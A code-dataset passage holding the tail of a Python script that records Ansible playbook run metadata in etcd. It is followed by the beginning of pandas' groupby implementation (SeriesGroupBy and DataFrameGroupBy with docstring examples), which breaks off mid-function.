'-s', '--server', metavar='ETCD_SERVER',
default=os.getenv('ETCD_SERVER', '127.0.0.1'),
help='etcd server ip or hostname')
parser.add_argument(
'-p', '--prefix', metavar='ETCD_PREFIX',
default=os.getenv('ETCD_PREFIX', DEFAULT_PREFIX),
help='etcd key prefix')
parser.add_argument(
'-P', '--playbook', metavar='ANSIBLE_PLAYBOOK',
default=os.getenv('ANSIBLE_PLAYBOOK'),
help='the name of the playbook that is being run')
parser.add_argument(
'-T', '--team', metavar='TEAM',
default=os.environ.get('TEAM', 'UNKNOWN'),
help='the team name that will be included in the touch metadata')
args = parser.parse_args(sysargs[1:])
client = etcd.Client(host=args.server)
_set_metadata(client, args.playbook, args.hostname, args.team, args.prefix)
return 0
def _set_metadata(client, playbook, hostname, team, prefix):
for key, value in _etcd_metadata(playbook, hostname, team).iteritems():
etcd_key = ETCD_KEY_TMPL.format(
prefix=prefix, hostname=hostname, key=key)
client.set(etcd_key, value)
def _etcd_metadata(playbook, hostname, team):
return {
'playbook': playbook,
'hostname': hostname,
'local_user': os.getlogin(),
'local_host': socket.gethostname(),
'local_git_ref': _git_ref(),
'timestamp': datetime.datetime.utcnow().isoformat(),
'team': team,
}
def _git_ref():
return subprocess.check_output(['git', 'rev-parse', '-q', 'HEAD']).strip()
if __name__ == '__main__':
sys.exit(main())
| mit | -579,326,199,278,497,900 | 27.74359 | 79 | 0.630687 | false |
datapythonista/pandas | pandas/core/groupby/generic.py | 1 | 63278 | """
Define the SeriesGroupBy and DataFrameGroupBy
classes that hold the groupby interfaces (and some implementations).
These are user facing as the result of the ``df.groupby(...)`` operations,
which here returns a DataFrameGroupBy object.
"""
from __future__ import annotations
from collections import (
abc,
namedtuple,
)
from functools import partial
from textwrap import dedent
from typing import (
Any,
Callable,
Hashable,
Iterable,
Mapping,
TypeVar,
Union,
)
import warnings
import numpy as np
from pandas._libs import (
lib,
reduction as libreduction,
)
from pandas._typing import (
ArrayLike,
FrameOrSeries,
FrameOrSeriesUnion,
Manager2D,
)
from pandas.util._decorators import (
Appender,
Substitution,
doc,
)
from pandas.core.dtypes.common import (
ensure_int64,
is_bool,
is_categorical_dtype,
is_dict_like,
is_integer_dtype,
is_interval_dtype,
is_numeric_dtype,
is_scalar,
)
from pandas.core.dtypes.missing import (
isna,
notna,
)
from pandas.core import (
algorithms,
nanops,
)
from pandas.core.aggregation import (
maybe_mangle_lambdas,
reconstruct_func,
validate_func_kwargs,
)
from pandas.core.apply import GroupByApply
from pandas.core.base import (
DataError,
SpecificationError,
)
import pandas.core.common as com
from pandas.core.construction import create_series_with_explicit_dtype
from pandas.core.frame import DataFrame
from pandas.core.generic import NDFrame
from pandas.core.groupby import base
from pandas.core.groupby.groupby import (
GroupBy,
_agg_template,
_apply_docs,
_transform_template,
group_selection_context,
)
from pandas.core.indexes.api import (
Index,
MultiIndex,
all_indexes_same,
)
from pandas.core.series import Series
from pandas.core.util.numba_ import maybe_use_numba
from pandas.plotting import boxplot_frame_groupby
NamedAgg = namedtuple("NamedAgg", ["column", "aggfunc"])
# TODO(typing) the return value on this callable should be any *scalar*.
AggScalar = Union[str, Callable[..., Any]]
# TODO: validate types on ScalarResult and move to _typing
# Blocked from using by https://github.com/python/mypy/issues/1484
# See note at _mangle_lambda_list
ScalarResult = TypeVar("ScalarResult")
def generate_property(name: str, klass: type[FrameOrSeries]):
"""
Create a property for a GroupBy subclass to dispatch to DataFrame/Series.
Parameters
----------
name : str
klass : {DataFrame, Series}
Returns
-------
property
"""
def prop(self):
return self._make_wrapper(name)
parent_method = getattr(klass, name)
prop.__doc__ = parent_method.__doc__ or ""
prop.__name__ = name
return property(prop)
def pin_allowlisted_properties(klass: type[FrameOrSeries], allowlist: frozenset[str]):
"""
Create GroupBy member defs for DataFrame/Series names in a allowlist.
Parameters
----------
klass : DataFrame or Series class
class where members are defined.
allowlist : frozenset[str]
Set of names of klass methods to be constructed
Returns
-------
class decorator
Notes
-----
Since we don't want to override methods explicitly defined in the
base class, any such name is skipped.
"""
def pinner(cls):
for name in allowlist:
if hasattr(cls, name):
# don't override anything that was explicitly defined
# in the base class
continue
prop = generate_property(name, klass)
setattr(cls, name, prop)
return cls
return pinner
@pin_allowlisted_properties(Series, base.series_apply_allowlist)
class SeriesGroupBy(GroupBy[Series]):
_apply_allowlist = base.series_apply_allowlist
def _iterate_slices(self) -> Iterable[Series]:
yield self._selected_obj
_agg_examples_doc = dedent(
"""
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.groupby([1, 1, 2, 2]).min()
1 1
2 3
dtype: int64
>>> s.groupby([1, 1, 2, 2]).agg('min')
1 1
2 3
dtype: int64
>>> s.groupby([1, 1, 2, 2]).agg(['min', 'max'])
min max
1 1 2
2 3 4
The output column names can be controlled by passing
the desired column names and aggregations as keyword arguments.
>>> s.groupby([1, 1, 2, 2]).agg(
... minimum='min',
... maximum='max',
... )
minimum maximum
1 1 2
2 3 4
.. versionchanged:: 1.3.0
The resulting dtype will reflect the return value of the aggregating function.
>>> s.groupby([1, 1, 2, 2]).agg(lambda x: x.astype(float).min())
1 1.0
2 3.0
dtype: float64"""
)
@Appender(
_apply_docs["template"].format(
input="series", examples=_apply_docs["series_examples"]
)
)
def apply(self, func, *args, **kwargs):
return super().apply(func, *args, **kwargs)
@doc(_agg_template, examples=_agg_examples_doc, klass="Series")
def aggregate(self, func=None, *args, engine=None, engine_kwargs=None, **kwargs):
if maybe_use_numba(engine):
with group_selection_context(self):
data = self._selected_obj
result, index = self._aggregate_with_numba(
data.to_frame(), func, *args, engine_kwargs=engine_kwargs, **kwargs
)
return self.obj._constructor(result.ravel(), index=index, name=data.name)
relabeling = func is None
columns = None
if relabeling:
columns, func = validate_func_kwargs(kwargs)
kwargs = {}
if isinstance(func, str):
return getattr(self, func)(*args, **kwargs)
elif isinstance(func, abc.Iterable):
# Catch instances of lists / tuples
# but not the class list / tuple itself.
func = maybe_mangle_lambdas(func)
ret = self._aggregate_multiple_funcs(func)
if relabeling:
# error: Incompatible types in assignment (expression has type
# "Optional[List[str]]", variable has type "Index")
ret.columns = columns # type: ignore[assignment]
return ret
else:
cyfunc = com.get_cython_func(func)
if cyfunc and not args and not kwargs:
return getattr(self, cyfunc)()
if self.grouper.nkeys > 1:
return self._python_agg_general(func, *args, **kwargs)
try:
return self._python_agg_general(func, *args, **kwargs)
except KeyError:
# TODO: KeyError is raised in _python_agg_general,
# see test_groupby.test_basic
result = self._aggregate_named(func, *args, **kwargs)
index = Index(sorted(result), name=self.grouper.names[0])
return create_series_with_explicit_dtype(
result, index=index, dtype_if_empty=object
)
agg = aggregate
def _aggregate_multiple_funcs(self, arg) -> DataFrame:
if isinstance(arg, dict):
# show the deprecation, but only if we
# have not shown a higher level one
# GH 15931
raise SpecificationError("nested renamer is not supported")
elif any(isinstance(x, (tuple, list)) for x in arg):
arg = [(x, x) if not isinstance(x, (tuple, list)) else x for x in arg]
# indicated column order
columns = next(zip(*arg))
else:
# list of functions / function names
columns = []
for f in arg:
columns.append(com.get_callable_name(f) or f)
arg = zip(columns, arg)
results: dict[base.OutputKey, FrameOrSeriesUnion] = {}
for idx, (name, func) in enumerate(arg):
key = base.OutputKey(label=name, position=idx)
results[key] = self.aggregate(func)
if any(isinstance(x, DataFrame) for x in results.values()):
from pandas import concat
res_df = concat(
results.values(), axis=1, keys=[key.label for key in results.keys()]
)
# error: Incompatible return value type (got "Union[DataFrame, Series]",
# expected "DataFrame")
return res_df # type: ignore[return-value]
indexed_output = {key.position: val for key, val in results.items()}
output = self.obj._constructor_expanddim(indexed_output, index=None)
output.columns = Index(key.label for key in results)
output = self._reindex_output(output)
return output
def _cython_agg_general(
self, how: str, alt: Callable, numeric_only: bool, min_count: int = -1
):
obj = self._selected_obj
objvals = obj._values
data = obj._mgr
if numeric_only and not is_numeric_dtype(obj.dtype):
# GH#41291 match Series behavior
raise NotImplementedError(
f"{type(self).__name__}.{how} does not implement numeric_only."
)
# This is overkill because it is only called once, but is here to
# mirror the array_func used in DataFrameGroupBy._cython_agg_general
def array_func(values: ArrayLike) -> ArrayLike:
try:
result = self.grouper._cython_operation(
"aggregate", values, how, axis=data.ndim - 1, min_count=min_count
)
except NotImplementedError:
# generally if we have numeric_only=False
# and non-applicable functions
# try to python agg
# TODO: shouldn't min_count matter?
result = self._agg_py_fallback(values, ndim=data.ndim, alt=alt)
return result
result = array_func(objvals)
ser = self.obj._constructor(
result, index=self.grouper.result_index, name=obj.name
)
return self._reindex_output(ser)
def _wrap_aggregated_output(
self,
output: Mapping[base.OutputKey, Series | ArrayLike],
) -> Series:
"""
Wraps the output of a SeriesGroupBy aggregation into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, ArrayLike]]
Data to wrap.
Returns
-------
Series
Notes
-----
In the vast majority of cases output will only contain one element.
The exception is operations that expand dimensions, like ohlc.
"""
assert len(output) == 1
name = self.obj.name
index = self.grouper.result_index
values = next(iter(output.values()))
result = self.obj._constructor(values, index=index, name=name)
return self._reindex_output(result)
def _wrap_transformed_output(
self, output: Mapping[base.OutputKey, Series | ArrayLike]
) -> Series:
"""
Wraps the output of a SeriesGroupBy aggregation into the expected result.
Parameters
----------
output : dict[base.OutputKey, Union[Series, np.ndarray, ExtensionArray]]
Dict with a sole key of 0 and a value of the result values.
Returns
-------
Series
Notes
-----
output should always contain one element. It is specified as a dict
for consistency with DataFrame methods and _wrap_aggregated_output.
"""
assert len(output) == 1
name = self.obj.name
values = next(iter(output.values()))
result = self.obj._constructor(values, index=self.obj.index, name=name)
# No transformations increase the ndim of the result
assert isinstance(result, Series)
return result
def _wrap_applied_output(
self,
data: Series,
keys: Index,
values: list[Any] | None,
not_indexed_same: bool = False,
) -> FrameOrSeriesUnion:
"""
Wrap the output of SeriesGroupBy.apply into the expected result.
Parameters
----------
data : Series
Input data for groupby operation.
keys : Index
Keys of groups that Series was grouped by.
values : Optional[List[Any]]
Applied output for each group.
not_indexed_same : bool, default False
Whether the applied outputs are not indexed the same as the group axes.
Returns
-------
DataFrame or Series
"""
if len(keys) == 0:
# GH #6265
return self.obj._constructor(
[],
name=self.obj.name,
index=self.grouper.result_index,
dtype=data.dtype,
)
assert values is not None
def _get_index() -> Index:
if self.grouper.nkeys > 1:
index = MultiIndex.from_tuples(keys, names=self.grouper.names)
else:
index = Index(keys, name=self.grouper.names[0])
return index
if isinstance(values[0], dict):
# GH #823 #24880
index = _get_index()
res_df = self.obj._constructor_expanddim(values, index=index)
res_df = self._reindex_output(res_df)
# if self.observed is False,
# keep all-NaN rows created while re-indexing
res_ser = res_df.stack(dropna=self.observed)
res_ser.name = self.obj.name
return res_ser
elif isinstance(values[0], (Series, DataFrame)):
return self._concat_objects(keys, values, not_indexed_same=not_indexed_same)
else:
# GH #6265 #24880
result = self.obj._constructor(
data=values, index=_get_index(), name=self.obj.name
)
return self._reindex_output(result)
def _aggregate_named(self, func, *args, **kwargs):
# Note: this is very similar to _aggregate_series_pure_python,
# but that does not pin group.name
result = {}
initialized = False
for name, group in self:
# Each step of this loop corresponds to
# libreduction._BaseGrouper._apply_to_group
# NB: libreduction does not pin name
object.__setattr__(group, "name", name)
output = func(group, *args, **kwargs)
output = libreduction.extract_result(output)
if not initialized:
# We only do this validation on the first iteration
libreduction.check_result_array(output, group.dtype)
initialized = True
result[name] = output
return result
@Substitution(klass="Series")
@Appender(_transform_template)
def transform(self, func, *args, engine=None, engine_kwargs=None, **kwargs):
return self._transform(
func, *args, engine=engine, engine_kwargs=engine_kwargs, **kwargs
)
def _cython_transform(
self, how: str, numeric_only: bool = True, axis: int = 0, **kwargs
):
assert axis == 0 # handled by caller
obj = self._selected_obj
is_numeric = is_numeric_dtype(obj.dtype)
if numeric_only and not is_numeric:
raise DataError("No numeric types to aggregate")
try:
result = self.grouper._cython_operation(
"transform", obj._values, how, axis, **kwargs
)
except (NotImplementedError, TypeError):
raise DataError("No numeric types to aggregate")
return obj._constructor(result, index=self.obj.index, name=obj.name)
def _transform_general(self, func: Callable, *args, **kwargs) -> Series:
"""
Transform with a callable func`.
"""
assert callable(func)
klass = type(self.obj)
results = []
for name, group in self:
# this setattr is needed for test_transform_lambda_with_datetimetz
object.__setattr__(group, "name", name)
res = func(group, *args, **kwargs)
results.append(klass(res, index=group.index))
# check for empty "results" to avoid concat ValueError
if results:
from pandas.core.reshape.concat import concat
concatenated = concat(results)
result = self._set_result_index_ordered(concatenated)
else:
result = self.obj._constructor(dtype=np.float64)
result.name = self.obj.name
# error: Incompatible return value type (got "Union[DataFrame, Series]",
# expected "Series")
return result # type: ignore[return-value]
def _can_use_transform_fast(self, result) -> bool:
return True
def _wrap_transform_fast_result(self, result: Series) -> Series:
"""
fast version of transform, only applicable to
builtin/cythonizable functions
"""
ids, _, _ = self.grouper.group_info
result = result.reindex(self.grouper.result_index, copy=False)
out = algorithms.take_nd(result._values, ids)
return self.obj._constructor(out, index=self.obj.index, name=self.obj.name)
def filter(self, func, dropna: bool = True, *args, **kwargs):
"""
Return a copy of a Series excluding elements from groups that
do not satisfy the boolean criterion specified by func.
Parameters
----------
func : function
To apply to each group. Should return True or False.
dropna : Drop groups that do not pass the filter. True by default;
if False, groups that evaluate False are filled with NaNs.
Notes
-----
Functions that mutate the passed object can produce unexpected
behavior or errors and are not supported. See :ref:`gotchas.udf-mutation`
for more details.
Examples
--------
>>> df = pd.DataFrame({'A' : ['foo', 'bar', 'foo', 'bar',
... 'foo', 'bar'],
... 'B' : [1, 2, 3, 4, 5, 6],
... 'C' : [2.0, 5., 8., 1., 2., 9.]})
>>> grouped = df.groupby('A')
>>> df.groupby('A').B.filter(lambda x: x.mean() > 3.)
1 2
3 4
5 6
Name: B, dtype: int64
Returns
-------
filtered : Series
"""
if isinstance(func, str):
wrapper = lambda x: getattr(x, func)(*args, **kwargs)
else:
wrapper = lambda x: func(x, *args, **kwargs)
# Interpret np.nan as False.
def true_and_notna(x) -> bool:
b = wrapper(x)
return b and notna(b)
try:
indices = [
self._get_index(name) for name, group in self if true_and_notna(group)
]
except (ValueError, TypeError) as err:
raise TypeError("the filter must return a boolean result") from err
filtered = self._apply_filter(indices, dropna)
return filtered
def nunique(self, dropna: bool = True) -> Series:
"""
Return number of unique elements in the group.
Returns
-------
Series
Number of unique values within each group.
"""
ids, _, _ = self.grouper.group_info
val = self.obj._values
codes, _ = algorithms.factorize(val, sort=False)
sorter = np.lexsort((codes, ids))
codes = codes[sorter]
ids = ids[sorter]
# group boundaries are where group ids change
# unique observations are where sorted values change
idx = np.r_[0, 1 + np.nonzero(ids[1:] != ids[:-1])[0]]
inc = np.r_[1, codes[1:] != codes[:-1]]
# 1st item of each group is a new unique observation
mask = codes == -1
if dropna:
inc[idx] = 1
inc[mask] = 0
else:
inc[mask & np.r_[False, mask[:-1]]] = 0
inc[idx] = 1
out = np.add.reduceat(inc, idx).astype("int64", copy=False)
if len(ids):
# NaN/NaT group exists if the head of ids is -1,
# so remove it from res and exclude its index from idx
if ids[0] == -1:
res = out[1:]
idx = idx[np.flatnonzero(idx)]
else:
res = out
else:
res = out[1:]
ri = self.grouper.result_index
# we might have duplications among the bins
if len(res) != len(ri):
res, out = np.zeros(len(ri), dtype=out.dtype), res
res[ids[idx]] = out
result = self.obj._constructor(res, index=ri, name=self.obj.name)
return self._reindex_output(result, fill_value=0)
@doc(Series.describe)
def describe(self, **kwargs):
result = self.apply(lambda x: x.describe(**kwargs))
if self.axis == 1:
return result.T
return result.unstack()
def value_counts(
self,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
bins=None,
dropna: bool = True,
):
from pandas.core.reshape.merge import get_join_indexers
from pandas.core.reshape.tile import cut
ids, _, _ = self.grouper.group_info
val = self.obj._values
def apply_series_value_counts():
return self.apply(
Series.value_counts,
normalize=normalize,
sort=sort,
ascending=ascending,
bins=bins,
)
if bins is not None:
if not np.iterable(bins):
# scalar bins cannot be done at top level
# in a backward compatible way
return apply_series_value_counts()
elif is_categorical_dtype(val.dtype):
# GH38672
return apply_series_value_counts()
# groupby removes null keys from groupings
mask = ids != -1
ids, val = ids[mask], val[mask]
if bins is None:
lab, lev = algorithms.factorize(val, sort=True)
llab = lambda lab, inc: lab[inc]
else:
# lab is a Categorical with categories an IntervalIndex
lab = cut(Series(val), bins, include_lowest=True)
# error: "ndarray" has no attribute "cat"
lev = lab.cat.categories # type: ignore[attr-defined]
# error: No overload variant of "take" of "_ArrayOrScalarCommon" matches
# argument types "Any", "bool", "Union[Any, float]"
lab = lev.take( # type: ignore[call-overload]
# error: "ndarray" has no attribute "cat"
lab.cat.codes, # type: ignore[attr-defined]
allow_fill=True,
# error: Item "ndarray" of "Union[ndarray, Index]" has no attribute
# "_na_value"
fill_value=lev._na_value, # type: ignore[union-attr]
)
llab = lambda lab, inc: lab[inc]._multiindex.codes[-1]
if is_interval_dtype(lab.dtype):
# TODO: should we do this inside II?
# error: "ndarray" has no attribute "left"
# error: "ndarray" has no attribute "right"
sorter = np.lexsort(
(lab.left, lab.right, ids) # type: ignore[attr-defined]
)
else:
sorter = np.lexsort((lab, ids))
ids, lab = ids[sorter], lab[sorter]
# group boundaries are where group ids change
idchanges = 1 + np.nonzero(ids[1:] != ids[:-1])[0]
idx = np.r_[0, idchanges]
if not len(ids):
idx = idchanges
# new values are where sorted labels change
lchanges = llab(lab, slice(1, None)) != llab(lab, slice(None, -1))
inc = np.r_[True, lchanges]
if not len(lchanges):
inc = lchanges
inc[idx] = True # group boundaries are also new values
out = np.diff(np.nonzero(np.r_[inc, True])[0]) # value counts
# num. of times each group should be repeated
rep = partial(np.repeat, repeats=np.add.reduceat(inc, idx))
# multi-index components
codes = self.grouper.reconstructed_codes
codes = [rep(level_codes) for level_codes in codes] + [llab(lab, inc)]
levels = [ping.group_index for ping in self.grouper.groupings] + [lev]
names = self.grouper.names + [self.obj.name]
if dropna:
mask = codes[-1] != -1
if mask.all():
dropna = False
else:
out, codes = out[mask], [level_codes[mask] for level_codes in codes]
if normalize:
out = out.astype("float")
d = np.diff(np.r_[idx, len(ids)])
if dropna:
m = ids[lab == -1]
np.add.at(d, m, -1)
acc = rep(d)[mask]
else:
acc = rep(d)
out /= acc
if sort and bins is None:
cat = ids[inc][mask] if dropna else ids[inc]
sorter = np.lexsort((out if ascending else -out, cat))
out, codes[-1] = out[sorter], codes[-1][sorter]
if bins is not None:
# for compat. with libgroupby.value_counts need to ensure every
# bin is present at every index level, null filled with zeros
diff = np.zeros(len(out), dtype="bool")
for level_codes in codes[:-1]:
diff |= np.r_[True, level_codes[1:] != level_codes[:-1]]
ncat, nbin = diff.sum(), len(levels[-1])
left = [np.repeat(np.arange(ncat), nbin), np.tile(np.arange(nbin), ncat)]
right = [diff.cumsum() - 1, codes[-1]]
_, idx = get_join_indexers(left, right, sort=False, how="left")
out = np.where(idx != -1, out[idx], 0)
if sort:
sorter = np.lexsort((out if ascending else -out, left[0]))
out, left[-1] = out[sorter], left[-1][sorter]
# build the multi-index w/ full levels
def build_codes(lev_codes: np.ndarray) -> np.ndarray:
return np.repeat(lev_codes[diff], nbin)
codes = [build_codes(lev_codes) for lev_codes in codes[:-1]]
codes.append(left[-1])
mi = MultiIndex(levels=levels, codes=codes, names=names, verify_integrity=False)
if is_integer_dtype(out.dtype):
out = ensure_int64(out)
return self.obj._constructor(out, index=mi, name=self.obj.name)
def count(self) -> Series:
"""
Compute count of group, excluding missing values.
Returns
-------
Series
Count of values within each group.
"""
ids, _, ngroups = self.grouper.group_info
val = self.obj._values
mask = (ids != -1) & ~isna(val)
minlength = ngroups or 0
out = np.bincount(ids[mask], minlength=minlength)
result = self.obj._constructor(
out,
index=self.grouper.result_index,
name=self.obj.name,
dtype="int64",
)
return self._reindex_output(result, fill_value=0)
def pct_change(self, periods=1, fill_method="pad", limit=None, freq=None):
"""Calculate pct_change of each value to previous entry in group"""
# TODO: Remove this conditional when #23918 is fixed
if freq:
return self.apply(
lambda x: x.pct_change(
periods=periods, fill_method=fill_method, limit=limit, freq=freq
)
)
if fill_method is None: # GH30463
fill_method = "pad"
limit = 0
filled = getattr(self, fill_method)(limit=limit)
fill_grp = filled.groupby(self.grouper.codes)
shifted = fill_grp.shift(periods=periods, freq=freq)
return (filled / shifted) - 1
@pin_allowlisted_properties(DataFrame, base.dataframe_apply_allowlist)
class DataFrameGroupBy(GroupBy[DataFrame]):
_apply_allowlist = base.dataframe_apply_allowlist
_agg_examples_doc = dedent(
"""
Examples
--------
>>> df = pd.DataFrame(
... {
... "A": [1, 1, 2, 2],
... "B": [1, 2, 3, 4],
... "C": [0.362838, 0.227877, 1.267767, -0.562860],
... }
... )
>>> df
A B C
0 1 1 0.362838
1 1 2 0.227877
2 2 3 1.267767
3 2 4 -0.562860
The aggregation is for each column.
>>> df.groupby('A').agg('min')
B C
A
1 1 0.227877
2 3 -0.562860
Multiple aggregations
>>> df.groupby('A').agg(['min', 'max'])
B C
min max min max
A
1 1 2 0.227877 0.362838
2 3 4 -0.562860 1.267767
Select a column for aggregation
>>> df.groupby('A').B.agg(['min', 'max'])
min max
A
1 1 2
2 3 4
Different aggregations per column
>>> df.groupby('A').agg({'B': ['min', 'max'], 'C': 'sum'})
B C
min max sum
A
1 1 2 0.590715
2 3 4 0.704907
To control the output names with different aggregations per column,
pandas supports "named aggregation"
>>> df.groupby("A").agg(
... b_min=pd.NamedAgg(column="B", aggfunc="min"),
... c_sum=pd.NamedAgg(column="C", aggfunc="sum"))
b_min c_sum
A
1 1 0.590715
2 3 0.704907
- The keywords are the *output* column names
- The values are tuples whose first element is the column to select
and the second element is the aggregation to apply to that column.
Pandas provides the ``pandas.NamedAgg`` namedtuple with the fields
``['column', 'aggfunc']`` to make it clearer what the arguments are.
As usual, the aggregation can be a callable or a string alias.
See :ref:`groupby.aggregate.named` for more.
.. versionchanged:: 1.3.0
The resulting dtype will reflect the return value of the aggregating function.
>>> df.groupby("A")[["B"]].agg(lambda x: x.astype(float).min())
B
A
1 1.0
2 3.0"""
)
@doc(_agg_template, examples=_agg_examples_doc, klass="DataFrame")
def aggregate(self, func=None, *args, engine=None, engine_kwargs=None, **kwargs):
if maybe_use_numba(engine):
with group_selection_context(self):
data = self._selected_obj
result, index = self._aggregate_with_numba(
data, func, *args, engine_kwargs=engine_kwargs, **kwargs
)
return self.obj._constructor(result, index=index, columns=data.columns)
relabeling, func, columns, order = reconstruct_func(func, **kwargs)
func = maybe_mangle_lambdas(func)
op = GroupByApply(self, func, args, kwargs)
result = op.agg()
if not is_dict_like(func) and result is not None:
return result
elif relabeling and result is not None:
# this should be the only (non-raising) case with relabeling
# used reordered index of columns
result = result.iloc[:, order]
result.columns = columns
if result is None:
# grouper specific aggregations
if self.grouper.nkeys > 1:
# test_groupby_as_index_series_scalar gets here with 'not self.as_index'
return self._python_agg_general(func, *args, **kwargs)
elif args or kwargs:
# test_pass_args_kwargs gets here (with and without as_index)
# can't return early
result = self._aggregate_frame(func, *args, **kwargs)
elif self.axis == 1:
# _aggregate_multiple_funcs does not allow self.axis == 1
# Note: axis == 1 precludes 'not self.as_index', see __init__
result = self._aggregate_frame(func)
return result
else:
# try to treat as if we are passing a list
gba = GroupByApply(self, [func], args=(), kwargs={})
try:
result = gba.agg()
except ValueError as err:
if "no results" not in str(err):
# raised directly by _aggregate_multiple_funcs
raise
result = self._aggregate_frame(func)
else:
sobj = self._selected_obj
if isinstance(sobj, Series):
# GH#35246 test_groupby_as_index_select_column_sum_empty_df
result.columns = [sobj.name]
else:
# select everything except for the last level, which is the one
# containing the name of the function(s), see GH#32040
result.columns = result.columns.rename(
[sobj.columns.name] * result.columns.nlevels
).droplevel(-1)
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
result.index = Index(range(len(result)))
return result._convert(datetime=True)
agg = aggregate
def _iterate_slices(self) -> Iterable[Series]:
obj = self._selected_obj
if self.axis == 1:
obj = obj.T
if isinstance(obj, Series) and obj.name not in self.exclusions:
# Occurs when doing DataFrameGroupBy(...)["X"]
yield obj
else:
for label, values in obj.items():
if label in self.exclusions:
continue
yield values
def _cython_agg_general(
self, how: str, alt: Callable, numeric_only: bool, min_count: int = -1
) -> DataFrame:
# Note: we never get here with how="ohlc"; that goes through SeriesGroupBy
data: Manager2D = self._get_data_to_aggregate()
orig = data
if numeric_only:
data = data.get_numeric_data(copy=False)
def array_func(values: ArrayLike) -> ArrayLike:
try:
result = self.grouper._cython_operation(
"aggregate", values, how, axis=data.ndim - 1, min_count=min_count
)
except NotImplementedError:
# generally if we have numeric_only=False
# and non-applicable functions
# try to python agg
# TODO: shouldn't min_count matter?
result = self._agg_py_fallback(values, ndim=data.ndim, alt=alt)
return result
# TypeError -> we may have an exception in trying to aggregate
# continue and exclude the block
new_mgr = data.grouped_reduce(array_func, ignore_failures=True)
if not len(new_mgr) and len(orig):
# If the original Manager was already empty, no need to raise
raise DataError("No numeric types to aggregate")
if len(new_mgr) < len(data):
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.{how} "
"is deprecated. In a future version, a TypeError will be raised. "
f"Before calling .{how}, select only columns which should be "
"valid for the function.",
FutureWarning,
stacklevel=4,
)
return self._wrap_agged_manager(new_mgr)
def _aggregate_frame(self, func, *args, **kwargs) -> DataFrame:
if self.grouper.nkeys != 1:
raise AssertionError("Number of keys must be 1")
obj = self._obj_with_exclusions
result: dict[Hashable, NDFrame | np.ndarray] = {}
if self.axis == 0:
# test_pass_args_kwargs_duplicate_columns gets here with non-unique columns
for name, data in self:
fres = func(data, *args, **kwargs)
result[name] = fres
else:
# we get here in a number of test_multilevel tests
for name in self.indices:
grp_df = self.get_group(name, obj=obj)
fres = func(grp_df, *args, **kwargs)
result[name] = fres
result_index = self.grouper.result_index
other_ax = obj.axes[1 - self.axis]
out = self.obj._constructor(result, index=other_ax, columns=result_index)
if self.axis == 0:
out = out.T
return out
def _aggregate_item_by_item(self, func, *args, **kwargs) -> DataFrame:
# only for axis==0
# tests that get here with non-unique cols:
# test_resample_with_timedelta_yields_no_empty_groups,
# test_resample_apply_product
obj = self._obj_with_exclusions
result: dict[int | str, NDFrame] = {}
for i, item in enumerate(obj):
ser = obj.iloc[:, i]
colg = SeriesGroupBy(
ser, selection=item, grouper=self.grouper, exclusions=self.exclusions
)
result[i] = colg.aggregate(func, *args, **kwargs)
res_df = self.obj._constructor(result)
res_df.columns = obj.columns
return res_df
def _wrap_applied_output(self, data, keys, values, not_indexed_same=False):
if len(keys) == 0:
result = self.obj._constructor(
index=self.grouper.result_index, columns=data.columns
)
result = result.astype(data.dtypes.to_dict(), copy=False)
return result
# GH12824
first_not_none = next(com.not_none(*values), None)
if first_not_none is None:
# GH9684 - All values are None, return an empty frame.
return self.obj._constructor()
elif isinstance(first_not_none, DataFrame):
return self._concat_objects(keys, values, not_indexed_same=not_indexed_same)
key_index = self.grouper.result_index if self.as_index else None
if isinstance(first_not_none, (np.ndarray, Index)):
# GH#1738: values is list of arrays of unequal lengths
# fall through to the outer else clause
# TODO: sure this is right? we used to do this
# after raising AttributeError above
return self.obj._constructor_sliced(
values, index=key_index, name=self._selection
)
elif not isinstance(first_not_none, Series):
# values are not series or array-like but scalars
# self._selection not passed through to Series as the
# result should not take the name of original selection
# of columns
if self.as_index:
return self.obj._constructor_sliced(values, index=key_index)
else:
result = self.obj._constructor(
values, index=key_index, columns=[self._selection]
)
self._insert_inaxis_grouper_inplace(result)
return result
else:
# values are Series
return self._wrap_applied_output_series(
keys, values, not_indexed_same, first_not_none, key_index
)
def _wrap_applied_output_series(
self,
keys,
values: list[Series],
not_indexed_same: bool,
first_not_none,
key_index,
) -> FrameOrSeriesUnion:
# this is to silence a DeprecationWarning
# TODO: Remove when default dtype of empty Series is object
kwargs = first_not_none._construct_axes_dict()
backup = create_series_with_explicit_dtype(dtype_if_empty=object, **kwargs)
values = [x if (x is not None) else backup for x in values]
all_indexed_same = all_indexes_same(x.index for x in values)
# GH3596
# provide a reduction (Frame -> Series) if groups are
# unique
if self.squeeze:
applied_index = self._selected_obj._get_axis(self.axis)
singular_series = len(values) == 1 and applied_index.nlevels == 1
# assign the name to this series
if singular_series:
values[0].name = keys[0]
# GH2893
# we have series in the values array, we want to
# produce a series:
# if any of the sub-series are not indexed the same
# OR we don't have a multi-index and we have only a
# single values
return self._concat_objects(
keys, values, not_indexed_same=not_indexed_same
)
# still a series
# path added as of GH 5545
elif all_indexed_same:
from pandas.core.reshape.concat import concat
return concat(values)
if not all_indexed_same:
# GH 8467
return self._concat_objects(keys, values, not_indexed_same=True)
# Combine values
# vstack+constructor is faster than concat and handles MI-columns
stacked_values = np.vstack([np.asarray(v) for v in values])
if self.axis == 0:
index = key_index
columns = first_not_none.index.copy()
if columns.name is None:
# GH6124 - propagate name of Series when it's consistent
names = {v.name for v in values}
if len(names) == 1:
columns.name = list(names)[0]
else:
index = first_not_none.index
columns = key_index
stacked_values = stacked_values.T
if stacked_values.dtype == object:
# We'll have the DataFrame constructor do inference
stacked_values = stacked_values.tolist()
result = self.obj._constructor(stacked_values, index=index, columns=columns)
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
return self._reindex_output(result)
def _cython_transform(
self, how: str, numeric_only: bool = True, axis: int = 0, **kwargs
) -> DataFrame:
assert axis == 0 # handled by caller
# TODO: no tests with self.ndim == 1 for DataFrameGroupBy
# With self.axis == 0, we have multi-block tests
# e.g. test_rank_min_int, test_cython_transform_frame
# test_transform_numeric_ret
# With self.axis == 1, _get_data_to_aggregate does a transpose
# so we always have a single block.
mgr: Manager2D = self._get_data_to_aggregate()
if numeric_only:
mgr = mgr.get_numeric_data(copy=False)
def arr_func(bvalues: ArrayLike) -> ArrayLike:
